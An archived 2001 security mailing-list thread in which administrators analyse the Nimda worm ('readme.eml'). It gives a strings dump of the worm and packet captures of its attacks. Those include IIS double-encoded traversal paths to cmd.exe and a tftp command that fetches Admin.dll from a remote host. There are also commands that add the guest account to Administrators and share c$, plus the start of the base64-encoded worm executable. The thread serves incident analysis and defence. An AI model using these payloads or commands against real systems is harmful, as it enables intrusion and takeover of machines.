Re: New worm? 'readme.eml'

From: Billy Smith (bsmithat_private)
Date: Tue Sep 18 2001 - 09:16:15 PDT
Next message: McCammon, Keith: "RE: New problem"
Previous message: rferrellat_private: "Re: New problem"
In reply to: Pedro Miller Rabinovitch: "New worm? 'readme.eml'"
Next in thread: Guillaume TARRARE: "RE: New worm? 'readme.eml'"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I thought you all might be interested in a strings listing of the 
readme.exe found in readme.eml.  Here are the some details(I deleted the 
noise):


System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
dontrunold

SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe





At 12:13 PM 9/18/2001 -0300, Pedro Miller Rabinovitch wrote:
>Hi,
>
>   is this CodeBlue? Some new worm? Or just one I hadn't heard about? It 
> uses double-encoding exploits, and propagates both by adding javascript 
> to the main page and by probing other systems...
>
>Report:
>
>Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:
>
>Date    Time  D Source IP       Sport Dport   P
>01Sep18 11:20 T 200.192.226.40   3933    80   T
>01Sep18 11:20 T 200.192.226.40   3767    80   T
>01Sep18 11:20 T 200.192.226.40   3572    80   T
>
>  SOURCE: 200.192.226.40
>
>  45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx 
> E...ba@.w..=...(xxxx
>  0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00 
> ...P{....~.NP."8.z..
>  47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET 
> /_vti_bin/..%255
>  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 
> c../..%255c../..%255
>  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 
> c../winnt/system32/c
>  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 
> md.exe?/c+dir HTTP/1
>  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e .0..Host: 
> www..Connn
>  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a          ection: 
> close....
>
>  45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx 
> E....c@.w..:...(xxxx
>  0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00 
> ...P{....O..P."8....
>  47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET 
> /_mem_bin/..%255
>  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 
> c../..%255c../..%255
>  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 
> c../winnt/system32/c
>  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 
> md.exe?/c+dir HTTP/1
>  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e .0..Host: 
> www..Connn
>  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a          ection: 
> close....
>
>  45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx 
> E...9e@.w.?....(xxxx
>  0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00 
> .].P{."6.LZ.P."8.6..
>  47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e GET 
> /msadc/..%255c..
>  2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e 
> /..%255c../..%255c/.
>  2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e 
> .%c1%1c../..%c1%1c..
>  2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 
> /..%c1%1c../winnt/sy
>  73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 
> stem32/cmd.exe?/c+di
>  72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 r 
> HTTP/1.0..Host: ww
>  77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 
> w..Connnection: clos
>  65 0d 0a 0d 0a                                              e....
>
>---------------
>
>When I connected to the originating server (femm.tdkomm.com.br), I saw the 
>normal web page for the institution, plus a pop-up window for 
>http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as follows:
>
>
>MIME-Version: 1.0
>Content-Type: multipart/related;
>type="multipart/alternative";
>boundary="====_ABC1234567890DEF_===="
>X-Priority: 3
>X-MSMail-Priority: Normal
>X-Unsent: 1
>
>--====_ABC1234567890DEF_====
>Content-Type: multipart/alternative;
>boundary="====_ABC0987654321DEF_===="
>
>--====_ABC0987654321DEF_====
>Content-Type: text/html;
>charset="iso-8859-1"
>Content-Transfer-Encoding: quoted-printable
>
>
>--====_ABC0987654321DEF_====--
>
>--====_ABC1234567890DEF_====
>Content-Type: audio/x-wav;
>name="readme.exe"
>Content-Transfer-Encoding: base64
>Content-ID: <EA4DMGBP9p>
>
>TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
>ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
>PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
>AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
>... (worm code follows)
>
>I've inspected the executable code, and it reads like a worm. (doh)
>
>Has anyone seen this?
>
>Regards,
>
>         Pedro.
>--
>Pedro Miller Rabinovitch
>Technology Manager
>Cipher Technology
>55-21-2579-3999
>http://www.cipher.com.br
>
>-----------------------------------------------------------------
>This list is provided by the SecurityFocus ARIS analyzer service.
>For more information on this free incident handling, management
>and tracking system please see: http://aris.securityfocus.com
>


-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: McCammon, Keith: "RE: New problem"
Previous message: rferrellat_private: "Re: New problem"
In reply to: Pedro Miller Rabinovitch: "New worm? 'readme.eml'"
Next in thread: Guillaume TARRARE: "RE: New worm? 'readme.eml'"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:50:13 PDT